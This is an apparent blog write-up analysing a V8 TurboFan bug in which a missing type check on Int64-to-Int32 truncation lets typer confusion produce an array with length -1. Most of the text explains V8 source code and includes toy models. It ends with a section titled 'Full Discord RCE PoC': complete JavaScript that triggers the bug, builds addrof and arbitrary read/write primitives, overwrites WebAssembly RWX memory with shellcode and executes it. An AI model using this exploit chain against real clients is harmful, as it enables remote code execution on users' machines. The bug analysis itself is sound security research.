void VisitSpeculativeIntegerAdditiveOp(Node* node, Truncation truncation,
                                       SimplifiedLowering* lowering) {  // [1]
  Type left_upper = GetUpperBound(node->InputAt(0));
  Type right_upper = GetUpperBound(node->InputAt(1));
  [...]
  // Try to use type feedback.
  Type const restriction =
      truncation.IsUsedAsWord32()
          ? Type::Any()
          : (truncation.identify_zeros() == kIdentifyZeros)
                ? Type::Signed32OrMinusZero()
                : Type::Signed32();  // [0]

  NumberOperationHint const hint = NumberOperationHint::kSignedSmall;  // [2]
  DCHECK_EQ(hint, NumberOperationHintOf(node->op()));
  [...]
  // UseInfo(MachineRepresentation::kWord32, Truncation::Any(identify_zeros), TypeCheckKind::kSignedSmall, feedback);
  UseInfo left_use =
      CheckedUseInfoAsWord32FromHint(hint, left_identify_zeros);  // [3]
  // For CheckedInt32Add and CheckedInt32Sub, we don't need to do
  // a minus zero check for the right hand side, since we already
  // know that the left hand side is a proper Signed32 value,
  // potentially guarded by a check.
  TRACE("[checked] We are second here %s", node->op()->mnemonic());
  // UseInfo(MachineRepresentation::kWord32, Truncation::Any(identify_zeros), TypeCheckKind::kSignedSmall, feedback);
  UseInfo right_use = CheckedUseInfoAsWord32FromHint(hint, kIdentifyZeros);  // [4]
  VisitBinop<T>(node, left_use, right_use, MachineRepresentation::kWord32,
                restriction);
}

template <Phase T>
void VisitBinop(Node* node, UseInfo left_use, UseInfo right_use,
                MachineRepresentation output,
                Type restriction_type = Type::Any()) {
  DCHECK_EQ(2, node->op()->ValueInputCount());
  ProcessInput<T>(node, 0, left_use);   // [5]
  ProcessInput<T>(node, 1, right_use);  // [6]
  for (int i = 2; i < node->InputCount(); i++) {
    EnqueueInput<T>(node, i);
  }
  SetOutput<T>(node, output, restriction_type);
}
```

The ProcessInput<LOWER> function calls ConvertInput at [1]:

```cpp
template <>
void RepresentationSelector::ProcessInput<LOWER>(Node* node, int index,
                                                 UseInfo use) {
  DCHECK_IMPLIES(use.type_check() != TypeCheckKind::kNone,
                 !node->op()->HasProperty(Operator::kNoDeopt) &&
                     node->op()->EffectInputCount() > 0);
  ConvertInput(node, index, use);  // [1]
}
```

In the ConvertInput function, each input is lowered/converted accordingly:

- For the input #22:NumberConstant at [1], its representation is stored in input_rep [2], which is the output representation we figured out in the Retype phase. For NumberConstant it is kRepTaggedSigned, and the use variable holds the UseInfo for SpeculativeSafeIntegerSubtract. The input_type is Range(0, 0). All these variables are passed to GetRepresentationFor [3].

- For the input #52:Select at [1], the representation stored in input_rep [2] is kRepWord64, as figured out in the Retype phase. But the UseInfo representation is kWord32, because that’s how the input is speculated to be used by the #41:SpeculativeSafeIntegerSubtract node. The input_type is Range(0, 0xFFFF_FFFF) (the NumberMax output range). All these variables are passed to GetRepresentationFor [3].

```cpp
void ConvertInput(Node* node, int index, UseInfo use,
                  Type input_type = Type::Invalid()) {
  // In the change phase, insert a change before the use if necessary.
  if (use.representation() == MachineRepresentation::kNone)
    return;  // No input requirement on the use.
  Node* input = node->InputAt(index);  // [1]
  DCHECK_NOT_NULL(input);
  NodeInfo* input_info = GetInfo(input);
  MachineRepresentation input_rep = input_info->representation();  // [2]
  [...]
    if (input_type.IsInvalid()) {
      input_type = TypeOf(input);
      TRACE("input_type %s", input_type);
    }
    [...]
    Node* n = changer_->GetRepresentationFor(input, input_rep, input_type,
                                             node, use);  // [3]
    // input=Select, input_rep=kRepWord64, input_type=Range(0,0xFFFF_FFFF), node=SpeculativeSafeIntegerSubtract
    // use=UseInfo(MachineRepresentation::kWord32, Truncation::Any(identify_zeros), TypeCheckKind::kSignedSmall, feedback)
    node->ReplaceInput(index, n);
  }
}
```

Let’s set aside the #22:NumberConstant input, which is not relevant here. The relevant input node is #52:Select. Its use_info.representation() [1] is kWord32, as we figured out, so GetWord32RepresentationFor [2] is called with the same variables that were passed to GetRepresentationFor [3] earlier, except that the input_ prefix in the variable names becomes output_.

```cpp
Node* RepresentationChanger::GetRepresentationFor(
    Node* node, MachineRepresentation output_rep, Type output_type,
    Node* use_node, UseInfo use_info) {
  [...]
  switch (use_info.representation()) {  // kWord32 for the #52:Select input of #41 [1]
    case MachineRepresentation::kWord32:
      return GetWord32RepresentationFor(node, output_rep, output_type, use_node,
                                        use_info);  // [2]
```

Now we’ve reached exactly the point where the code was patched.

For the #52:Select input node, these are the variables:

- input=Select, output_rep=kRepWord64, output_type=Range(0,0xFFFF_FFFF), use_node=SpeculativeSafeIntegerSubtract

- use=UseInfo(MachineRepresentation::kWord32, Truncation::Any(identify_zeros), TypeCheckKind::kSignedSmall, feedback)

As output_rep is kRepWord64, we take the branch at [1]. Using the output_type range, the type is determined by calling output_type.Is(Type::Unsigned32()) at [2]. Essentially, at [3] the range is checked to see which type it falls under, Signed32 or Unsigned32. Range(0, 0xFFFF_FFFF) is obviously not within Signed32 (-0x8000_0000 to 0x7FFF_FFFF), but it is exactly Unsigned32 (0 to 0xFFFF_FFFF). The if condition is satisfied, so a new node is created with op = machine()->TruncateInt64ToInt32() [4] and inserted between #52:Select and #41:SpeculativeSafeIntegerSubtract.

Node* RepresentationChanger::GetWord32RepresentationFor(
    Node* node, MachineRepresentation output_rep, Type output_type,
    Node* use_node, UseInfo use_info) {
  // Eagerly fold representation changes for constants.
  [...]
  } else if (output_rep == MachineRepresentation::kWord64) {  [1]
    if (output_type.Is(Type::Signed32()) ||
        output_type.Is(Type::Unsigned32())) {  [2]
      op = machine()->TruncateInt64ToInt32();  [4]
    }
    [...]
  return InsertConversion(node, op, use_node);
}

// src/compiler/turbofan-types.cc
// Check if [this] <= [that].
bool Type::SlowIs(Type that) const {
  DisallowGarbageCollection no_gc;
  // [...] the Select's Range(0, 4294967295) matches the 32-bit unsigned integer type
  if (that.IsRange()) {
    return this->IsRange() && Contains(that.AsRange(), this->AsRange());  [3]
  }
  [...]
}
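The small JavaScript model below makes the decision at [1], [2] and [4] concrete. It is a sketch under simplifying assumptions, not V8 code. Types are plain [min, max] intervals standing in for V8's real Signed32/Unsigned32 types, and the helper names (isSubtype, chooseConversionPrePatch, truncateInt64ToInt32) are hypothetical. BigInt.asIntN mimics keeping the low 32 bits as a signed value.

```javascript
// Simplified model (not V8 code) of the pre-patch branch in GetWord32RepresentationFor.
// Types are [min, max] intervals; SIGNED32 and UNSIGNED32 stand in for V8's
// Type::Signed32() and Type::Unsigned32().
const SIGNED32 = { min: -0x80000000, max: 0x7fffffff };
const UNSIGNED32 = { min: 0, max: 0xffffffff };

// Interval containment: does every value of `range` lie inside `type`?
function isSubtype(range, type) {
  return range.min >= type.min && range.max <= type.max;
}

// Pre-patch rule: a Word64 value typed as Signed32 or Unsigned32 gets a plain
// truncation. The use's requested type check (typeCheck) is ignored entirely.
function chooseConversionPrePatch(outputType, typeCheck) {
  if (isSubtype(outputType, SIGNED32) || isSubtype(outputType, UNSIGNED32)) {
    return "TruncateInt64ToInt32";
  }
  return "other conversion (not modeled)";
}

// TruncateInt64ToInt32 keeps the low 32 bits and reads them as a signed integer.
function truncateInt64ToInt32(value) {
  return Number(BigInt.asIntN(32, BigInt(value)));
}

const selectType = { min: 0, max: 0xffffffff }; // Range(0, 0xFFFF_FFFF) of #52:Select
console.log(isSubtype(selectType, SIGNED32));                       // false
console.log(isSubtype(selectType, UNSIGNED32));                     // true
console.log(chooseConversionPrePatch(selectType, "kSignedSmall")); // TruncateInt64ToInt32
console.log(truncateInt64ToInt32(0xffffffff));                      // -1
```

The kSignedSmall check requested by the use plays no part in this choice. That gap is exactly what the patch closes.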

That’s how this bug surfaced. The patch adds a new condition at [1]: an Unsigned32 output is truncated with TruncateInt64ToInt32 only when use_info.type_check() == TypeCheckKind::kNone. If the node that uses this input doesn’t need a type check, the plain truncation is still fine. If the use requests a kSignedSmall, kSigned32 or kArrayIndex check and the output type is a positive safe integer, V8 uses CheckedUint64ToInt32 [2] instead, which checks for overflow. What a subtle bug.

    if (output_type.Is(Type::Signed32()) ||
        (output_type.Is(Type::Unsigned32()) &&
         use_info.type_check() == TypeCheckKind::kNone) ||  [1]
        (output_type.Is(cache_->kSafeInteger) &&
         use_info.truncation().IsUsedAsWord32())) {
      op = machine()->TruncateInt64ToInt32();
    } else if (use_info.type_check() == TypeCheckKind::kSignedSmall ||
               use_info.type_check() == TypeCheckKind::kSigned32 ||
               use_info.type_check() == TypeCheckKind::kArrayIndex) {
      if (output_type.Is(cache_->kPositiveSafeInteger)) {
        op = simplified()->CheckedUint64ToInt32(use_info.feedback());  [2]
      }
      [...]
    }
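The same kind of toy model can illustrate the patched rule. This is again a hypothetical sketch rather than V8's implementation. The helper names are invented, the kSafeInteger / IsUsedAsWord32 clause of the real patch is left out, and a deoptimization is modeled as a thrown Error.

```javascript
// Simplified model (not V8 code) of the patched branch.
const SIGNED32 = { min: -0x80000000, max: 0x7fffffff };
const UNSIGNED32 = { min: 0, max: 0xffffffff };
const POSITIVE_SAFE_INTEGER = { min: 0, max: Number.MAX_SAFE_INTEGER };

function isSubtype(range, type) {
  return range.min >= type.min && range.max <= type.max;
}

function chooseConversionPatched(outputType, typeCheck) {
  // Unsigned32 may only be truncated blindly when the use performs no type check.
  if (isSubtype(outputType, SIGNED32) ||
      (isSubtype(outputType, UNSIGNED32) && typeCheck === "kNone")) {
    return "TruncateInt64ToInt32";
  }
  // Otherwise a checking conversion is selected for these type checks.
  if (["kSignedSmall", "kSigned32", "kArrayIndex"].includes(typeCheck) &&
      isSubtype(outputType, POSITIVE_SAFE_INTEGER)) {
    return "CheckedUint64ToInt32";
  }
  return "other conversion (not modeled)";
}

// Runtime effect of the checked conversion: values above the int32 maximum
// cannot be represented, so the optimized code would deoptimize (modeled as a throw).
function checkedUint64ToInt32(value) {
  if (value > 0x7fffffff) {
    throw new Error("deoptimize: value does not fit in int32");
  }
  return value;
}

const selectType = { min: 0, max: 0xffffffff };
console.log(chooseConversionPatched(selectType, "kSignedSmall")); // CheckedUint64ToInt32
console.log(chooseConversionPatched(selectType, "kNone"));        // TruncateInt64ToInt32
try {
  checkedUint64ToInt32(0xffffffff);
} catch (e) {
  console.log(e.message); // deoptimize: value does not fit in int32
}
```

With the check in place, 0xFFFF_FFFF can no longer silently become -1 on its way into the comparison.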

I’m really curious how these experts find such amazing bugs; bugs like this are incredibly subtle and complex. Was this one found via fuzzing, or through countless hours spent debugging and studying the source code? Respect either way.

Type Confusion (How the Array Gets Length -1)

To demonstrate the issue, let’s modify the foo function and run it.

function foo(a) {
  let x = -1;
  if (a) {
    x = 0xFFFFFFFF;
  }
  let oob_smi = new Array(0 - Math.max(0, x));
  // TurboFan tracks 0 as the only possible length,
  // but the actual length in memory is 1
  if (oob_smi.length != 0) {
    // 0 (TurboFan's tracked length) - 1
    oob_smi.length = -1;
  }
  return oob_smi;
}
try {
  var before_opt = foo(true);
}
catch (err) {
  // RangeError: Invalid array length (0 - 0xFFFF_FFFF = -4294967295)
  console.log(err);
}
for (var i = 0; i < 0x10000; ++i) {
  foo(false);
}
// No error here? How?
var oob_smi = foo(true);
console.log(oob_smi.length); // -1, wtf? How?

Notice that our array’s length became -1. In V8, array lengths are treated as unsigned values, so a length of -1 interpreted as an unsigned 32-bit integer becomes 0xFFFFFFFF. This effectively gives the array a length of 4,294,967,295 and allows access to a huge portion of memory. As you can see, we can access a value out of bounds at offset 1337.

Now let’s quickly understand how the array length became -1. In the exploit’s version of foo, we create an array whose size is Math.sign(0 - Math.max(0, x)) and then call pop() on it, which decreases the array size by 1. A quick note about Math.sign: it returns the sign of a number, that is, 1 for a positive number, -1 for a negative number and 0 for zero. With that in mind, let’s see how this function can be used to achieve out-of-bounds array access, meaning access to memory beyond the array’s allocated bounds.

Before optimization, calling foo(false) sets x to -1. Math.max(0, -1) results in 0, and Math.sign(0 - 0) is also 0, so an array of size 0 is created. Calling pop() on an empty array simply returns undefined and leaves the array unchanged. Calling foo(true) sets x to 0xFFFFFFFF. In this case, Math.max(0, x) returns 0xFFFFFFFF, and Math.sign(0 - 0xFFFFFFFF) gives -1. The code then tries to create an array with a size of -1, which is invalid and throws an error. So far, everything works as expected.

During optimization, however, two interesting things happen: the truncation bug we discussed previously, and a typer confusion. After optimization, foo(true) still sets x to 0xFFFFFFFF, but because of the truncation bug Math.max(0, x) incorrectly returns -1. Math.sign(0 - (-1)) then becomes 1, so the array is created with a size of 1. TurboFan, however, assumes that the output of Math.sign always falls within the range [-1, 0]. In reality, the truncation bug lets us produce a value outside this range.

What do I mean by Range(-1, 0)? TurboFan’s Range type represents an interval of integers defined by a minimum and a maximum value. Unlike generic types such as Signed32 or Unsigned32, a Range lets TurboFan track integers precisely so that it can optimize more effectively. For instance, the constant 1 is tracked as Range(1, 1) instead of a broader type like Unsigned32. These ranges are then used by the optimizations that run after the typer phase. In our exploit, TurboFan assumes that Math.sign will always return a value in Range(-1, 0). The truncation bug produces a value outside of it and confuses the typer.

This confusion is what eventually gives us arbitrary memory read and write. Here is how. During optimization, TurboFan does not directly invoke the pop function when pop() is called. It inlines the operation instead, replacing the pop call with a set of instructions that perform the same operation without the overhead of a function call. We can confirm this behavior by analyzing TurboFan’s output in Turbolizer and reviewing V8’s source code. At this stage, the inlined code reduces the array’s length by 1 and stores the updated length. The typer also computes the Range of the subtraction, which will be Range(-1, -1):

if (array.length != 0) {
  let length = array.length;
  --length;
  array.length = length;
  array[length] = %TheHole();
}

Later in the optimization process, TurboFan applies constant folding, which simplifies the code further. It no longer calculates length = length - 1 dynamically. It computes the new length directly from the assumed range: it evaluates 0 - 1 at compile time and writes that result into the length. Here’s the issue: the array’s actual length should be 0 after the pop, but because of the truncation bug the typer tracks a value of 0 - 1 = -1. This typer confusion lets us create an array with a length of -1, giving us full access to memory. The final inlined and folded code looks like this:

let array = Array(n);
if (n != 0) {
  array.length = -1;
  array[-1] = %TheHole();
}

By exploiting this confusion, we can craft an array with a negative length and gain arbitrary memory access.
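To see why a length of -1 is so dangerous, consider a hypothetical unsigned bounds check. The sketch assumes, as described above, that the length is treated as an unsigned 32-bit value. The inBounds helper is illustrative only and is not V8's actual check.

```javascript
// Hypothetical unsigned 32-bit bounds check (not V8's actual code).
function inBounds(index, length) {
  // `>>> 0` reinterprets both values as unsigned 32-bit integers
  return (index >>> 0) < (length >>> 0);
}

const corruptedLength = -1;
console.log(corruptedLength >>> 0);           // 4294967295
console.log(inBounds(1337, corruptedLength)); // true: index 1337 passes the check
console.log(inBounds(1337, 1));               // false for a sane length of 1
```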

If you’re wondering how we got an array with a length of -1, we need to dig a little deeper into TurboFan optimization.

function foo(a) {
  let x = -1;
  if (a) {
    x = 0xFFFFFFFF;
  }
  let oob_smi = new Array(Math.sign(0 - Math.max(0, x)));
  oob_smi.pop();
  return oob_smi;
}
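As a baseline, here is a plain-JavaScript sketch of what this function does when it is not miscompiled, alongside a hypothetical emulation of the truncation. The `| 0` in fooEmulatedTruncation is an assumption standing in for TruncateInt64ToInt32. The code runs normally and does not trigger the JIT bug.

```javascript
// Same logic as foo above; in the interpreter this is computed correctly.
function foo(a) {
  let x = -1;
  if (a) {
    x = 0xFFFFFFFF;
  }
  let oob_smi = new Array(Math.sign(0 - Math.max(0, x)));
  oob_smi.pop();
  return oob_smi;
}

// Hypothetical emulation of the miscompiled value: the result of Math.max is
// truncated to a signed 32-bit integer with `| 0`.
function fooEmulatedTruncation(a) {
  let x = -1;
  if (a) {
    x = 0xFFFFFFFF;
  }
  let oob_smi = new Array(Math.sign(0 - (Math.max(0, x) | 0)));
  oob_smi.pop();
  return oob_smi;
}

console.log(foo(false).length); // 0
try {
  foo(true);
} catch (e) {
  console.log(e instanceof RangeError); // true
}
// A correct pop() on a length-1 array leaves length 0, not -1.
console.log(fooEmulatedTruncation(true).length); // 0
```

Even with the emulated truncation, correct semantics give length 0. The -1 only appears once TurboFan folds the length update using its wrong assumption.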

Typer confusion for OOB access

The function creates an array of size n = Math.sign(0 - Math.max(0, x)) and then calls pop() on it, which reduces the array length by 1 (array.length = length - 1). Before TurboFan optimizes foo, calling foo(true) in the Ignition interpreter goes through the following steps:

- x is 0xFFFFFFFF.

- Math.max(0, x) returns 0xFFFFFFFF.

- Math.sign(0 - 0xFFFFFFFF) gives -1 because its argument is negative.

- The code then tries to create an array with a size of -1, which is invalid and throws an error, because in JS we can’t create an array with a negative length.

So far, everything works as expected. During optimization, however, two interesting things happen: the truncation bug we discussed previously kicks in, and TurboFan’s typer gets confused as a result. If we call foo(true) after optimization:

- x becomes 0xFFFFFFFF.

- Due to the truncation bug, Math.max(0, x) incorrectly returns -1 instead of 0xFFFFFFFF.

- Math.sign(0 - (-1)) therefore evaluates to 1,

- which in turn creates an array with a size of 1.

- Calling pop() on this array should produce an array with length 0, but instead we get an array with length -1. Why?

- TurboFan doesn’t know about the truncation bug. It assumes that the output of Math.sign will always be -1 for a foo(true) call or 0 for a foo(false) call. Because a length of -1 would throw an error, it concludes that the array can only ever be created with a length of 0. It doesn’t realize that the truncation bug lets us create an array with a length of 1.

- TurboFan does not invoke pop() directly. It inlines the operation to optimize it. Why waste resources calling a function when a few instructions can do the same job? The inlined code reduces the array length by 1 whenever the length is non-zero, without actually calling pop.

- At this point, the array’s actual length becomes 0. TurboFan’s typer, which tracks the array length for optimization purposes, computes the new length as -1. So far, this mismatch hasn’t caused any issues because the array’s actual length hasn’t been set to -1 yet.

    let n = Math.sign(0 - (-1)); // 1
    let array = Array(n); // TurboFan only expects 0, but we can create length 1
    if (array.length != 0) {
      let length = array.length;
      --length;
      array.length = length;
    }

- But now, TurboFan takes it a step further with constant folding optimization, simplifying the code even more. Instead of dynamically calculating length - 1 at runtime, TurboFan precomputes the updated value during compilation and replaces it directly. Why bother performing length - 1 when you can simply set the new length upfront?

    let n = Math.sign(0 - (-1)); // 1
    let array = Array(n); // TurboFan only expects 0, but we can create length 1
    if (n != 0) {
      array.length = -1;
    }

- That means our array now has a length of 0xFFFF_FFFF, giving us access to memory far beyond its actual bounds on the V8 heap.
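The typer’s reasoning in the steps above can be mirrored with a toy interval model. This is a simplified sketch of the explanation in this post, not TurboFan’s actual typer. The range helper and the way each step is typed are assumptions chosen to follow the argument.

```javascript
// Toy interval typer (hypothetical; mirrors the reasoning above, not V8's code).
const range = (min, max) => ({ min, max });

// x is either -1 or 0xFFFFFFFF, so Math.max(0, x) is typed [0, 0xFFFFFFFF].
const maxType = range(0, 0xffffffff);

// 0 - Math.max(0, x): subtracting from a constant negates and swaps the bounds.
const subType = range(0 - maxType.max, 0 - maxType.min); // [-4294967295, 0]

// Math.sign is monotonic, so the signs of the bounds give the result range.
const signType = range(Math.sign(subType.min), Math.sign(subType.max)); // [-1, 0]

// new Array(n) throws for negative n, so surviving lengths are typed [0, 0].
const lengthType = range(Math.max(0, signType.min), signType.max); // [0, 0]

// Inlined pop(): length - 1 is typed [-1, -1], a single value, so it is constant-folded.
const newLengthType = range(lengthType.min - 1, lengthType.max - 1);
const foldedLength =
  newLengthType.min === newLengthType.max ? newLengthType.min : undefined;

// What actually runs: the truncated Math.max result feeds Math.sign.
const truncatedMax = Math.max(0, 0xffffffff) | 0; // -1 instead of 4294967295
const actualN = Math.sign(0 - truncatedMax);      // 1, outside the typed [-1, 0]

console.log(signType, lengthType, foldedLength, actualN);
console.log(foldedLength >>> 0); // 4294967295 when read as an unsigned length
```

The typer only ever sees [0, 0] for the length, so it folds the pop() store to the constant -1. The array that actually reaches that store has length 1.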

Full Discord RCE PoC

Here is the full PoC. To understand how the exploit works after the out-of-bounds access, check out the video on YouTube.

// Helpers that reinterpret the same 8 bytes as a BigInt or a float64
let conversion_buffer = new ArrayBuffer(8);
let float_view = new Float64Array(conversion_buffer);
let int_view = new BigUint64Array(conversion_buffer);
BigInt.prototype.hex = function() {
  return '0x' + this.toString(16);
};
BigInt.prototype.i2f = function() {
  int_view[0] = this;
  return float_view[0];
}
Number.prototype.f2i = function() {
  float_view[0] = this;
  return int_view[0];
}
// Allocate many short-lived strings to trigger garbage collection
function gc() {
  for (let i = 0; i < ((1024 * 1024) / 0x10); i++) {
    var a = new String();
  }
}

let shellcode = [2.40327734437787e-310, -1.1389104046892079e-244, 3.1731330715403803e+40, 1.9656830452398213e-236, 1.288531947997e-312, 8.3024907661975715e+270, 1.6469439731597732e+93, 9.026845734376378e-308];

function pwn() {
  /* Prepare RWX */
  var buffer = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
  let module = new WebAssembly.Module(buffer);
  var instance = new WebAssembly.Instance(module);
  var exec_shellcode = instance.exports.main;

  function f(a) {
    let x = -1;
    if (a) x = 0xFFFFFFFF;
    // Trigger the bug: once f is optimized, f(true) yields an array with length -1
    let oob_smi = new Array(Math.sign(0 - Math.max(0, x, -1)));
    oob_smi.pop();
    let oob_double = [3.14, 3.14];
    let arr_addrof = [{}];
    let aar_double = [2.17, 2.17];
    let www_double = new Float64Array(8);
    return [oob_smi, oob_double, arr_addrof, aar_double, www_double];
  }
  gc();

  // Warm up f so that TurboFan optimizes it
  for (var i = 0; i < 0x10000; ++i) {
    f(false);
  }
  let [oob_smi, oob_double, arr_addrof, aar_double, www_double] = f(true);
  console.log("[+] oob_smi.length = " + oob_smi.length);
  oob_smi[14] = 0x1234;
  console.log("[+] oob_double.length = " + oob_double.length);

  let primitive = {
    addrof: (obj) => {
      arr_addrof[0] = obj;
      return (oob_double[8].f2i() >> 32n) - 1n;
    },
    half_aar64: (addr) => {
      oob_double[15] = ((oob_double[15].f2i() & 0xffffffff00000000n)
                        | ((addr - 0x8n) | 1n)).i2f();
      return aar_double[0].f2i();
    },
    full_aaw: (addr, values) => {
      oob_double[27] = 0x8888n.i2f();
      oob_double[28] = addr.i2f();
      for (let i = 0; i < values.length; i++) {
        www_double[i] = values[i];
      }
    }
  };

  console.log(primitive.addrof(oob_double).hex());
  let addr_instance = primitive.addrof(instance);
  console.log("[+] instance = " + addr_instance.hex());
  // Offset 0x68 into the Wasm instance is specific to this V8 version
  let addr_shellcode = primitive.half_aar64(addr_instance + 0x68n);
  console.log("[+] shellcode = " + addr_shellcode.hex());
  primitive.full_aaw(addr_shellcode, shellcode);
  console.log("[+] GO");
  exec_shellcode();
  return;
}
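For readers who want to experiment with the building blocks, here are the PoC’s i2f/f2i helpers rewritten as standalone functions, along with the arithmetic that addrof performs. The function names are hypothetical and the leaked value is made up. The sketch assumes, as the PoC’s `>> 32n` implies, that the leaked pointer sits in the upper 32 bits of the slot. V8 tags heap-object pointers by setting their lowest bit, which is why 1 is subtracted.

```javascript
// Standalone versions of the PoC's conversion helpers (hypothetical names).
const buffer = new ArrayBuffer(8);
const floatView = new Float64Array(buffer);
const intView = new BigUint64Array(buffer);

// Store a 64-bit integer and read the same bytes back as a float64.
function i2f(value) {
  intView[0] = value;
  return floatView[0];
}

// Store a float64 and read the same bytes back as a 64-bit integer.
function f2i(value) {
  floatView[0] = value;
  return intView[0];
}

// addrof-style arithmetic: take the upper 32 bits of a leaked slot and drop the tag bit.
function untaggedUpperHalf(slot) {
  return (slot >> 32n) - 1n;
}

const leaked = 0x0804a3c500000000n; // made-up example value, not a real leak
const asFloat = i2f(leaked);
console.log(f2i(asFloat) === leaked);                // true: the bits round-trip
console.log(untaggedUpperHalf(leaked).toString(16)); // 804a3c4
```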